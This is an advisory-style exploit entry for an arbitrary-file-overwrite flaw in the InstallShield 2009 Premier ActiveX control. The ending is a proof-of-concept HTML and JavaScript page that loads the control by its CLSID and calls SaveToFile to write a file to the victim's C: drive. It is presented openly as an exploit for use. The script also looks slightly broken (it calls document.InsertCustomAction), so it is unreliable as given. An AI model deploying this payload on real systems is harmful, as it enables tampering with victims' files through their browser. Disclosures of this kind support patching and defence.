9 lines
No EOL
855 B
Text
9 lines
No EOL
855 B
Text
source: https://www.securityfocus.com/bid/43857/info
|
|
|
|
InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability.
|
|
|
|
Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control.
|
|
|
|
InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected.
|
|
|
|
# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ <b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/> by : the_Edit0r <b/> <b/> <object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object> <script> try{ var obj = document.InsertCustomAction('Edit0r'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('check C:'); } catch(err){ window.alert('Poc failed'); } </script> |